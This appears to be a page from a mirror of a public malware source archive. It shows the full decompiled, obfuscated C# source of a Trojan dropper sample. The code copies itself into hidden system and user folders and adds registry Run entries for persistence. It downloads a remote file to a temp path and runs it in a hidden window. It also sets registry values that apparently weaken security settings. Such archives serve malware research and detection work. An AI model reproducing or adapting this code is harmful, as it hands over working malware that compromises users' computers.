mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-26 21:35:27 +00:00
203 lines
5.7 KiB
C#
203 lines
5.7 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: .
|
|||
|
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
|
|||
|
|
|||
|
using \u0001;
|
|||
|
using \u0008;
|
|||
|
using \u000E;
|
|||
|
using \u000F;
|
|||
|
using Microsoft.Win32;
|
|||
|
using System;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.IO;
|
|||
|
using System.Net;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
using System.Threading;
|
|||
|
|
|||
|
namespace \u000E
|
|||
|
{
|
|||
|
internal sealed class \u0005
|
|||
|
{
|
|||
|
[NonSerialized]
|
|||
|
internal static \u0002 \u0001;
|
|||
|
private Mutex \u0001;
|
|||
|
private \u0002 \u0001 = new \u0002();
|
|||
|
|
|||
|
public void \u000F()
|
|||
|
{
|
|||
|
this.\u0011();
|
|||
|
this.\u0013();
|
|||
|
this.\u0012();
|
|||
|
this.\u0001.\u000F();
|
|||
|
new Thread(new ThreadStart(\u0005.\u0010)).Start();
|
|||
|
}
|
|||
|
|
|||
|
public static void \u0010()
|
|||
|
{
|
|||
|
Registry.CurrentUser.OpenSubKey(\u0005.\u0001(3716));
|
|||
|
while (true)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
\u0005.\u000F(Process.GetProcessById(Process.GetCurrentProcess().Id));
|
|||
|
Thread.Sleep(10);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private void \u0011()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
this.\u0001 = new Mutex(true, \u000F.\u0001.\u0001.\u0003);
|
|||
|
this.\u0001.ReleaseMutex();
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
Environment.Exit(0);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private void \u0012()
|
|||
|
{
|
|||
|
string fileName = Process.GetCurrentProcess().MainModule.FileName;
|
|||
|
if (\u000F.\u0001.\u0001.\u0016)
|
|||
|
{
|
|||
|
\u000F.\u0001.\u0001.\u0006[0] = Environment.GetFolderPath(Environment.SpecialFolder.System) + \u0005.\u0001(1971) + \u000F.\u0001.\u0001.\u0004[0];
|
|||
|
\u000F.\u0001.\u0001.\u0006[1] = Environment.GetFolderPath(Environment.SpecialFolder.CommonProgramFiles) + \u0005.\u0001(1971) + \u000F.\u0001.\u0001.\u0004[1];
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
\u000F.\u0001.\u0001.\u0006[0] = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0005.\u0001(1971) + \u000F.\u0001.\u0001.\u0004[0];
|
|||
|
\u000F.\u0001.\u0001.\u0006[1] = Environment.GetEnvironmentVariable(\u0005.\u0001(3219)) + \u0005.\u0001(1971) + \u000F.\u0001.\u0001.\u0004[1];
|
|||
|
}
|
|||
|
if (this.\u000F())
|
|||
|
return;
|
|||
|
try
|
|||
|
{
|
|||
|
foreach (string str in \u000F.\u0001.\u0001.\u0006)
|
|||
|
{
|
|||
|
if (!\u000F.\u0001.\u0001.\u0010(str))
|
|||
|
System.IO.File.Copy(fileName, str);
|
|||
|
System.IO.File.SetAttributes(str, FileAttributes.Hidden);
|
|||
|
}
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
if (\u000F.\u0001.\u0001.\u0016)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
Registry.LocalMachine.OpenSubKey(\u0005.\u0001(3773), true).SetValue(\u000F.\u0001.\u0001.\u0005[0], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[0] + (object) '"'));
|
|||
|
Registry.LocalMachine.OpenSubKey(\u0005.\u0001(3834), true).SetValue(\u000F.\u0001.\u0001.\u0005[1], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[1] + (object) '"'));
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
Registry.CurrentUser.OpenSubKey(\u0005.\u0001(3773), true).SetValue(\u000F.\u0001.\u0001.\u0005[0], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[0] + (object) '"'));
|
|||
|
Registry.CurrentUser.OpenSubKey(\u0005.\u0001(3834), true).SetValue(\u000F.\u0001.\u0001.\u0005[1], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[1] + (object) '"'));
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
this.\u0001.Close();
|
|||
|
foreach (string str in \u000F.\u0001.\u0001.\u0006)
|
|||
|
new Process()
|
|||
|
{
|
|||
|
StartInfo = {
|
|||
|
FileName = str,
|
|||
|
WindowStyle = ProcessWindowStyle.Hidden
|
|||
|
}
|
|||
|
}.Start();
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
Environment.Exit(0);
|
|||
|
}
|
|||
|
|
|||
|
public void \u000F([In] string obj0)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
this.\u0001.Close();
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
string str = \u000F.\u0001.\u0001.\u000F(new Random().Next(5, 12)) + \u0005.\u0001(3210);
|
|||
|
new WebClient().DownloadFile(obj0, Environment.GetEnvironmentVariable(\u0005.\u0001(3219)) + \u0005.\u0001(1971) + str);
|
|||
|
new Process()
|
|||
|
{
|
|||
|
StartInfo = {
|
|||
|
FileName = (Environment.GetEnvironmentVariable(\u0005.\u0001(3219)) + \u0005.\u0001(1971) + str),
|
|||
|
WindowStyle = ProcessWindowStyle.Hidden
|
|||
|
}
|
|||
|
}.Start();
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
Environment.Exit(0);
|
|||
|
}
|
|||
|
|
|||
|
private bool \u000F()
|
|||
|
{
|
|||
|
string[] strArray = \u000F.\u0001.\u0001.\u0006;
|
|||
|
for (int index = 0; index < strArray.Length; index++)
|
|||
|
{
|
|||
|
string str = strArray[index];
|
|||
|
if (!\u000F.\u0001.\u0001.\u0010(str))
|
|||
|
return false;
|
|||
|
}
|
|||
|
return true;
|
|||
|
}
|
|||
|
|
|||
|
private void \u0013()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
Registry.CurrentUser.OpenSubKey(\u0005.\u0001(3919), true).SetValue(\u0005.\u0001(4000), (object) \u0005.\u0001(1896), RegistryValueKind.DWord);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
if (!\u000F.\u0001.\u0001.\u0015)
|
|||
|
return;
|
|||
|
try
|
|||
|
{
|
|||
|
Registry.CurrentUser.OpenSubKey(\u0005.\u0001(3919), true).SetValue(\u0005.\u0001(4009), (object) \u0005.\u0001(1936), RegistryValueKind.DWord);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
Registry.CurrentUser.OpenSubKey(\u0005.\u0001(4034), true).SetValue(\u0005.\u0001(4111), (object) \u0005.\u0001(1936), RegistryValueKind.DWord);
|
|||
|
Registry.LocalMachine.OpenSubKey(\u0005.\u0001(4034), true).SetValue(\u0005.\u0001(4111), (object) \u0005.\u0001(1936), RegistryValueKind.DWord);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
static \u0005() => \u0003.\u000F();
|
|||
|
}
|
|||
|
}
|